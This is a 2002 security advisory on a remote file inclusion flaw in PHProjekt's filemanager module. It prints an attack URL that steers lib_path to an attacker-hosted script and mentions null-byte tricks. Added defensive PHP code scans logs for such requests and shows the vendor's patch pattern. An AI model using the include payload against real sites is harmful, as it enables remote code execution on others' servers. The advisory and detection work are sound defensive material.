
PHProjekt arbitrary command execution
15th Mar 2002 [SBWID-5185]
COMMAND

	PHProjekt arbitrary command execution

SYSTEMS AFFECTED

	3.1a and previous

PROBLEM

	b0iler found the following:

	This script is a content management system for websites, much like
	slashcode or phpnuke.

	The problem is in the module filemanager, where you can directly
	access the module and then define values which would have been defined
	with the script's global configuration file had the module not been
	accessed directly. The first line in filemanager/filemanager_forms.php
	is:

	include_once("$lib_path/access_form.inc.php");

	so an attacker could go to

	http://site.com/filemanager/filemanager_forms.php?lib_path=http://attacker.com/nasty/scripts

	and the script at http://hacker.com/nasty/scripts/access_form.inc.php
	would get include()'d. I am sure you have seen the remotely included
	scripts with the passthru() example many times.

	If PHP is compiled with allow_url_fopen off then an attacker would have a
	harder time exploiting this. I can only see guessing the path to an
	uploaded script as the only other way of exploiting this (if
	magic_quotes is on - else null byte can do some damage). I believe it
	is secure since if they upload a script with the name lib_path the path
	(ex. /tmp/random/access_form.inc.php) will be stored in $lib_path. This
	would make the include_once try to include
	/tmp/random/access_form.inc.php/access_form.inc.php which would not
	work. PHP will delete this /tmp/randomcharacters/access_form.php when
	it ends, so it cannot be sent as lib_path once the error msg (if
	display_errors is on) tells the attacker the path to the script. I
	heard concerns about this from someone running PHP who wanted a secure
	install and configuration.
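
	An added example from the defender's side (not part of b0iler's advisory and not PHProjekt code): a small PHP script that scans web-server access log lines for requests that push a URL or a null byte into the lib_path parameter, the two conditions discussed above. The log lines are constructed samples in Apache combined format; the parameter name lib_path and the attacker.example host are taken from or modelled on the advisory, and the helper name findIncludeAbuse is an assumption.

```php
<?php
// Added example, not code from the advisory or from PHProjekt: flag access
// log entries whose lib_path query parameter carries a remote URL or a
// null byte. The log lines are constructed samples in Apache combined format.
$sampleLog = <<<'LOG'
203.0.113.5 - - [15/Mar/2002:10:01:02 +0000] "GET /filemanager/filemanager_forms.php?lib_path=http://attacker.example/nasty/scripts HTTP/1.0" 200 512 "-" "Mozilla/4.0"
198.51.100.7 - - [15/Mar/2002:10:01:09 +0000] "GET /index.php?mode=filemanager HTTP/1.0" 200 2048 "-" "Mozilla/4.0"
203.0.113.5 - - [15/Mar/2002:10:02:15 +0000] "GET /filemanager/filemanager_forms.php?lib_path=/tmp/abc%00 HTTP/1.0" 500 0 "-" "Mozilla/4.0"
LOG;

// Query parameters that this application turns into include paths.
// lib_path is the one named in the advisory.
$pathParams = ['lib_path'];

/**
 * Return one finding per log line whose path parameter looks like an
 * include-steering attempt. Each finding: line number, parameter, reasons.
 */
function findIncludeAbuse(string $logText, array $pathParams): array
{
    $findings = [];
    foreach (explode("\n", trim($logText)) as $index => $line) {
        // Extract the request target from the quoted request line.
        if (!preg_match('/"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/', $line, $m)) {
            continue;
        }
        $qpos = strpos($m[1], '?');
        if ($qpos === false) {
            continue;
        }
        parse_str(substr($m[1], $qpos + 1), $params); // also percent-decodes
        foreach ($pathParams as $name) {
            if (!isset($params[$name]) || !is_string($params[$name])) {
                continue;
            }
            $value   = $params[$name];
            $reasons = [];
            // A URL scheme means include_once would fetch the file remotely
            // when allow_url_fopen is on.
            if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $value)) {
                $reasons[] = 'remote URL in include path';
            }
            // A decoded NUL truncates the path on old PHP, dropping the
            // "/access_form.inc.php" suffix the module appends.
            if (strpos($value, "\0") !== false) {
                $reasons[] = 'null byte in include path';
            }
            if ($reasons !== []) {
                $findings[] = ['line' => $index + 1, 'param' => $name, 'reasons' => $reasons];
            }
        }
    }
    return $findings;
}

foreach (findIncludeAbuse($sampleLog, $pathParams) as $f) {
    printf("line %d: %s -> %s\n", $f['line'], $f['param'], implode(', ', $f['reasons']));
}
```

	Run it against a real log by reading the file into $sampleLog; the second sample line, which goes through index.php with a plain mode name, produces no finding, while the first and third do.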
	

	It would be best if all the modules included the global configuration
	file as their first line and double check to make sure no variables are
	left to other scripts passing them. Or some sort of modules.php script
	like phpnuke has wouldn't be a bad idea either and it locks security by
	making sure the script isn't called directly.

SOLUTION

	The author took this advice and added this as the first line in the
	module:

	if (!defined("lib_included")) { die("Please use index.php!"); }

	Since I believe constants cannot be defined with GPC.
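
	An added example (not PHProjekt's own code) of the pattern the patch line above relies on, combined with the recommendation from the PROBLEM section: the entry point defines the constant and sets $lib_path itself, and the module refuses to run unless the constant exists. Two files are shown in one listing. The constant name lib_included, index.php and filemanager/filemanager_forms.php come from the advisory; the 'mode' parameter, the lib/ directory and the module table are assumptions.

```php
<?php
// --- index.php (entry point) --------------------------------------------
// Added example, not PHProjekt's code. The constant is the only thing the
// module trusts: GET/POST/Cookie data can set variables when
// register_globals is on, but it cannot define() a constant.
define('lib_included', true);

// Set the library path from this file's own location, so a $lib_path
// supplied in the query string is overwritten before any module runs.
// (__DIR__ needs PHP 5.3+; use dirname(__FILE__) on older versions.)
$lib_path = __DIR__ . '/lib';

// Choose the module from a fixed table keyed by a short name. The request
// never supplies a path, only a key; 'mode' is an assumed parameter name.
$modules = [
    'filemanager' => __DIR__ . '/filemanager/filemanager_forms.php',
];
$mode = isset($_GET['mode']) ? (string) $_GET['mode'] : '';
if (!isset($modules[$mode])) {
    header('HTTP/1.0 404 Not Found');
    exit('Unknown module');
}
require $modules[$mode];
?>

<?php
// --- filemanager/filemanager_forms.php (module, separate file) ----------
// First statement of the module, as in the vendor's patch: a direct request
// to this file never passes through index.php, so the constant is missing
// and the script stops before any include is evaluated.
if (!defined('lib_included')) { die('Please use index.php!'); }

// Reached only via index.php, so $lib_path is the value set there and the
// include can point neither at a remote host nor at a stray upload.
include_once $lib_path . '/access_form.inc.php';
```

	The constant check alone closes the direct-access hole; setting $lib_path in the entry point additionally removes the dependence on register_globals being off, so the module stays safe even if a later change drops the guard.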
	

	The author was contacted a few days ago and was very quick to respond.
	They also took the security problem seriously, got out a patch asap,
	and notified their mailing list. The author says the script will be in
	for a rewrite to help improve overall security and structure. New
	version will be out shortly.